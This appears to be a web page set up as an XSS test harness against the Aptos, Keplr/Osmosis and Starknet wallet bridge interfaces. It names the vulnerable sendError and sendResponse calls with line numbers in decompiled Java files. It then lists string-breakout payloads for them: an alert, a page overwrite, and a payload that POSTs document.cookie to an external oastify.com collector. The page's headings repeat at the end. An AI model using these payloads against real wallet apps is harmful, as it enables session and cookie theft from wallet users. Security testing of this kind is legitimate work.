🎯 Targeted XSS Test - Aptos, Osmosis, Starknet Interfaces

Target Vulnerabilities

APTOS:
• window.aptos.sendError(id, "error_message") - Line 33 in cFK.java
• window.aptos.sendResponse(id, JSON.stringify(data)) - Lines 61, 65 in cFK.java

OSMOSIS (Keplr):
• window.keplr.sendError(id, "error_message") - Line 30 in cFJ.java
• window.keplr.sendResponse(id, JSON.stringify(data)) - Lines 59, 63 in cFJ.java

STARKNET:
• window.starknet.sendError(id, "error_message") - Line 32 in cfY.java
• window.starknet.sendResponse(id, JSON.stringify(data)) - Line 60 in cfY.java

XSS Payloads

Basic XSS: ";alert('XSS');//
DOM Manipulation:

";document.body.innerHTML='HACKED
';//

Data Exfiltration: ";fetch('http://r0sv7p79vx6xljkghjke5tnqfhl89zdn2.oastify.com/steal',{method:'POST',body:document.cookie});//
Console Log: ";console.log('XSS_EXECUTED');//

🎯 Targeted XSS Test - Aptos, Osmosis, Starknet Interfaces

Target Vulnerabilities

XSS Payloads

HACKED

Test Controls

Test Results